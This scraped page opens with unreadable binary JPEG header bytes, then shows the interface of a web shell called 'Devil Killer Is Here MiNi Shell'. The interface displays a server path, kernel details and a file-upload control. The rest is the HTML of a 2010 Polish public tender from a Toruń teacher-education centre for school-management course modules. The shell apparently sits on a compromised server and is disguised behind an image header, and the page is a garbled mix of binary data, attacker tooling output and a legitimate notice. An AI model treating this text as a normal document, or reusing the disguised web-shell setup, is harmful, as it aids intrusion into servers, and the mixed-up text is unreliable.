JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100428/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100428/102693-N-2010.html

<p class="kh_header"><b>Toruń: przygotowanie autorskich scenariuszy i prowadzenie zajęć podczas kursu
kwalifikacyjnego dla oświatowej kadry kierowniczej, realizowanych w ramach Projektu pt.
Klucz do uczenia - program wsparcia kujawsko-pomorskich nauczycieli</b><br>
<b>Numer ogłoszenia: 102693 - 2010; data zamieszczenia: 28.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Kujawsko-Pomorskie Centrum Edukacji Nauczycieli , Aleja Solidarności 3, 87-100 Toruń, woj. kujawsko-pomorskie, tel. 56 62 277 47, faks 56 62 231 81.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kpcen-torun.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> przygotowanie autorskich scenariuszy i prowadzenie zajęć podczas kursu
kwalifikacyjnego dla oświatowej kadry kierowniczej, realizowanych w ramach Projektu pt.
Klucz do uczenia - program wsparcia kujawsko-pomorskich nauczycieli.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jst przygotowanie autorskich scenariuszy i prowadzenie zajęć
podczas czterech edycji kursu kwalifikacyjnego dla oświatowej kadry kierowniczej.
Prowadzący zajęcia ma spełniać wszystkie wymagania niezbędne i co najmniej trzy
wymagania dodatkowe określone w rozdziale VIII niniejszej specyfikacji
Zajęcia mają być realizowane w wymiarze godzinowym (ilość godzin zgodna
zestawieniami przedstawionymi w niniejszej specyfikacji) wg. ustalonego harmonogramu.
Treści zajęć muszą odpowiadać celom wyszczególnionym niniejszej specyfikacji.
Odbiór usługi zostanie udokumentowany przekazaniem Zamawiającemu scenariuszy
zajęć, przekazaniem Zamawiającemu do powielenia materiałów dla uczestników kursu,
zapisami w dzienniku kursu czasu i tematyki zajęć.
Zamawiający nie przewiduje zawarcia umowy ramowej.
Zamawiający nie przewiduje udzielenia zamówień uzupełniających.
Zamawiający nie przewiduje możliwości składania ofert wariantowych.
Zamawiający nie przewiduje zastosowania aukcji elektronicznej.
SZCZEGÓŁOWY OPIS PRZEDMIOTU ZAMÓWIENIA
Od Wykonawcy wymagana jest dyspozycyjność, mobilność - możliwość prowadzenia zajęć
na terenie całego województwa kujawsko-pomorskiego, a także możliwość prowadzenia
zajęć w weekendy oraz gotowość do prowadzenia zajęć wg ustalonego harmonogramu.
Zamawiający wskazuje i zabezpiecza miejsce oraz termin prowadzenia zajęć, a Wykonawca
jest zobowiązany przeprowadzić szkolenie we wskazanym miejscu i terminie.
Cele kursu
cele ogólny :
umożliwienie uzyskania kwalifikacji do zajmowania stanowisk kierowniczych
w placówkach oświatowych, o których mowa w rozporządzeniu Ministra Edukacji
Narodowej z dnia 27 października 2009 r. (Dz. U. Nr 184, poz. 1436).
wyposażenie w wiedzę i umiejętności potrzebne do sprawnego i twórczego
zarządzania placówką oświatową z uwzględnieniem priorytetów edukacyjnych
wzbogacenie warsztatu pracy o umiejętność planowania, organizowania i oceniania
pracy nauczycieli.
nabycie umiejętności skutecznego motywowania do pracy i kierowania pracą
zespołów nauczycielskich
nabycie umiejętności właściwego stosowania metod i technik pracy z dorosłymi.
przewidywane efekty szkolenia:
tworzenie i skutecznie realizowanie programów: nauczania, rozwoju placówki
oświatowej, wychowawczego i profilaktyki
kierowanie zespołem ludzkim
planowanie i efektywne realizowanie oceniania wewnątrzszkolnego
komunikacji społecznej
stosowanie prawa oświatowego i finansowego
samokształcenie i planowanie własnego rozwoju
kierowanie procesem wspierania jakości pracy szkoły
kierowanie rozwojem szkoły
wspieranie rozwoju zawodowego nauczyciela
stosowanie nowoczesnych technik informacyjnych w zarządzaniu szkołą
organizacja pracy administracyjno-biurowej
współpraca ze środowiskiem lokalnym..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>doświadczenie w zakresie edukacji dorosłych
. doświadczenie w zakresie prowadzenia szkoleń w obszarze tematyki
zgłaszanej w przetargu/projekcie i na dowód tego wykażą, że w okresie 3 lat, a
jeżeli okres prowadzenia szkoleń jest krótszy, to w tym czasie przeprowadzili
3 szkolenia lub uczestniczyli jako wykładowcy w 3 szkoleniach w zakresie
edukacji osób dorosłych.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>b) dysponują osobami zdolnymi do wykonania zamówienia, tj. osobami, które
posiadają poniższe kwalifikacje zawodowe - warunki obowiązkowe:
. wykształcenie co najmniej wyższe magisterskie z przygotowaniem
pedagogicznym,
. ukończone studia podyplomowe lub kursy kwalifikacyjne lub posiadają tytuł
naukowy
oraz wykażą spełnienie przynajmniej trzech z poniższych warunków opcjonalnych:
. ukończone kursy edukatorskie.
. ukończone kursy i warsztaty doskonalące zgodne z tematyką kursu.
. posiadają doświadczenie w zarządzaniu oświatą i współpraca z jst w zakresie
oświaty.
. opracowali autorski program, materiały dla uczestników i scenariusz szkoleń
dla nauczycieli.
. ukończyli szkolenie z zakresu tematyki gender - w przypadku zamiaru
prowadzenia szkolenia z tej tematyki jest to warunek konieczny.
. ukończyli szkolenie z zakresu posługiwania się narzędziami TOC,</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 30</li>
<li>2 - Przedstawiony scenariusz zajęć - 30</li>
<li>3 - Spełnianie kryteriów dodatkowych - 35</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Poza przypadkami określonymi w umowie zmiany umowy będą mogły nastąpić w
wymienionych niżej okolicznościach:
a) Zaistnienia, po zawarciu umowy, przypadku siły wyższej, przez którą na
potrzeby niniejszego warunku, rozumieć należy zdarzenie zewnętrzne wobec
łączącej strony więzi prawnej:
- o charakterze niezależnym od stron,
- którego strony nie mogły przewidzieć przed zawarciem umowy,
- którego nie można uniknąć ani któremu strony nie mogły zapobiec przy
zachowaniu należytej staranności, której nie można przypisać drugiej stronie.
Za siłę wyższą warunkującą zmianę umowy uważać się będzie w
szczególności: powódź, pożar, inne klęski żywiołowe, nagłe załamania
warunków atmosferycznych, nagłe przerwy w dostawie energii elektrycznej.
b) Zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym
wpływ na realizację przedmiotu zamówienia lub świadczenia stron,
c) Powstania rozbieżności lub niejasności w rozumieniu pojęć użytych w
umowie, których nie będzie można usunąć w inny sposób, a zmiana będzie
umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu
jednoznacznej interpretacji jej zapisów przez strony,
d) Zaistnienia okoliczności leżących po stronie Zamawiającego, w szczególności
spowodowanych sytuacją finansową, zdolnościami płatniczymi lub warunkami
organizacyjnymi bądź okolicznościami, które nie były możliwe do
PROJEKT WSPÓŁFINANSOWANY Z FUNDUSZY UNII EUROPEJSKIEJ W RAMACH PROGRAMU OPERACYJNEGO KAPITAŁ LUDZKI
Priorytet IX, Rozwój wykształcenia i kompetencji w regionach
Działanie 9.4,Wysoko wykwalifikowane kadry systemu oświaty
Tytuł projektu: Klucz do uczenia - program wsparcia kujawsko-pomorskich nauczycieli.
przewidzenia w momencie zawarcia umowy - zmianie mogą ulec termin
realizacji umowy bądź terminy wynikające z harmonogramów płatności,
e) Gdy zaistnieje inna, niemożliwa do przewidzenia w momencie zawarcia
umowy okoliczność prawna, ekonomiczna lub techniczna, za którą żadna ze
stron nie ponosi odpowiedzialności, skutkująca brakiem możliwości
należytego wykonania umowy, zgodnie ze specyfikacja istotnych warunków
zamówienia - Zamawiający dopuszcza możliwość zmiany umowy, w
szczególności w zakresie zmiany przedmiotu zamówienia, terminu realizacji,
a także innych wymienionych w umowie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kpcen-torun.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Kujawsko-Pomorskie Centrum Edukacji Nauczycieli
Ul. Al. Solidarności 3
87-100 Toruń.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.05.2010 godzina 15:00, miejsce: Kujawsko-Pomorskie Centrum Edukacji Nauczycieli
Ul. Al. Solidarności 3
87-100 Toruń.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> PROJEKT WSPÓŁFINANSOWANY Z FUNDUSZY UNII EUROPEJSKIEJ W RAMACH PROGRAMU OPERACYJNEGO KAPITAŁ LUDZKI
Priorytet IX, Rozwój wykształcenia i kompetencji w regionach
Działanie 9.4,Wysoko wykwalifikowane kadry systemu oświaty
Tytuł projektu: Klucz do uczenia - program wsparcia kujawsko-pomorskich nauczycieli..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> MODUŁ 1
Ogólna teoria organizacji i zarządzania.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cele szczegółowe :
. Zaprezentowanie teorii organizacji i zarządzania.
. Wyposażenie słuchaczy w niezbędną, w kierowaniu placówką, wiedzę z teorii organizacji
i zarządzania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 30</li>
<li>2. Przedstawiony scenariusz zajęć - 35</li>
<li>3. Spełnianie kryteriów dodatkowych - 35</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> MODUŁ 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cele szczegółowe:
. Wyposażenie w wiedzę z zakresu prawa oświatowego.
. Rozwijanie umiejętności interpretacji i stosowania prawa oświatowego.
PROJEKT WSPÓŁFINANSOWANY Z FUNDUSZY UNII EUROPEJSKIEJ W RAMACH PROGRAMU OPERACYJNEGO KAPITAŁ LUDZKI
Priorytet IX, Rozwój wykształcenia i kompetencji w regionach
Działanie 9.4,Wysoko wykwalifikowane kadry systemu oświaty
Tytuł projektu: Klucz do uczenia - program wsparcia kujawsko-pomorskich nauczycieli.
. Uświadomienie znaczenia prawa wewnętrznego szkoły i zasad jego
tworzenia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> MODUŁ 3
Psychologia w kierowaniu placówką oświatową.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> MODUŁ 3
Psychologia w kierowaniu placówką oświatową
Cele szczegółowe:
. Wyposażenie w wiedzę i umiejętności z zakresu komunikacji
interpersonalnej.
. Doskonalenie umiejętności budowania właściwych relacji
międzyludzkich.
. Poznanie mechanizmów wpływania na ludzi.
. Umiejętne stosowanie w praktyce zasady rozwiązywania konfliktów
we współdziałaniu.
. Doskonalenie umiejętności kierowania własną karierę zawodową.
. Diagnozowanie sytuacji wychowawczych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 30</li>
<li>2. Przedstawiony scenariusz zajęć - 35</li>
<li>3. Spełnianie kryteriów dodatkowych - 35</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> MODUŁ 4
Kierowanie zmianą.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cele szczegółowe:
. Rozumienie procesów zachodzących w kierowaniu zmianą.
. Efektywne kierowanie procesem zmiany edukacyjnej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 30</li>
<li>2. Przedstawiony scenariusz zajęć - 35</li>
<li>3. Spełnianie kryteriów dodatkowych - 35</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> MODUŁ 5
Zarządzanie jakością, diagnozowanie pracy placówki oświatowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cele szczegółowe:
. Poznanie systemów jakości pracy organizacji.
. Poznanie procedur diagnozowania pracy szkoły.
. Stosowanie w praktyce diagnozowania pracy szkoły.
. Planowanie i realizowanie wewnątrzszkolnego systemu doskonalenia w
oparciu o diagnozę potrzeb nauczycieli i szkoły..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 30</li>
<li>2. Przedstawiony scenariusz zajęć - 35</li>
<li>3. Spełnianie kryteriów dodatkowych - 35</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> MODUŁ 6
Kierowanie i administrowanie placówką oświatową.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cele szczegółowe:
. Rozwijanie umiejętności i sprawności organizacyjno-kierowniczych.
. Rozumienie roli czynników motywujących ludzi do działania.
. Wykształcenie umiejętności organizacji procesów pedagogicznych w
placówce.
. Zdobycie wiedzy, umiejętności i sprawności w dziedzinach: znajomość
procedur i interpretacja działowa budżetu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> MODUŁ 7
Projektowanie programu placówki oświatowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cele szczegółowe:
. Wykształcenie umiejętności programowania pracy szkoły.
. Wyposażenie w umiejętność stymulowania rozwoju zawodowego
nauczycieli.
Doskonalenie umiejętności projektowania programów wychowawczych i
profilaktycznych.
. Wyposażenie w umiejętności dokonywania ewaluacji: wewnątrzszkolnego
systemu oceniania, szkolnego zestawu programów nauczania, programów
wychowawczych i profilaktycznych.
. Wyposażenie w umiejętności analizowania wyników egzaminów
zewnętrznych i umiejętność wykorzystania uzyskanych danych do planowania
pracy szkoły..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 30</li>
<li>2. Przedstawiony scenariusz zajęć - 35</li>
<li>3. Spełnianie kryteriów dodatkowych - 35</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> MODUŁ 8
Organizacja procesu pedagogicznego i nadzoru pedagogicznego
w placówce oświatowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cele szczegółowe:
. Wyposażenie w wiedzę z zakresu zasad organizacji pracy pedagogicznej.
. Zapoznanie z procedurami oceniania i nadzorowania pracy szkoły.
. Zaznajomienie z warunkami i trybem sprawowania nadzoru
pedagogicznego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 30</li>
<li>2. Przedstawiony scenariusz zajęć - 35</li>
<li>3. Spełnianie kryteriów dodatkowych - 35</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> MODUŁ 9
Placówka a środowisko lokalne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cele szczegółowe:
. Planowanie i realizowanie strategii współpracy ze środowiskiem.
. Promowanie placówki w środowisku.
. Korzystanie z zasad public relations..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 30</li>
<li>2. Przedstawiony scenariusz zajęć - 35</li>
<li>3. Spełnianie kryteriów dodatkowych - 35</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Moduł 10
Wykorzystanie funduszy strukturalnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cele szczegółowe:
. Zapoznanie ze strategiami rozwoju edukacji w Unii Europejskiej ze
szczególnym uwzględnieniem polskiej strategii rozwoju edukacji.
. Zapoznanie z programami edukacyjnymi skierowanymi do placówek
oświatowych.
. Doskonalenie umiejętności pisania wniosków o uzyskanie funduszy
strukturalnych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</p></li>
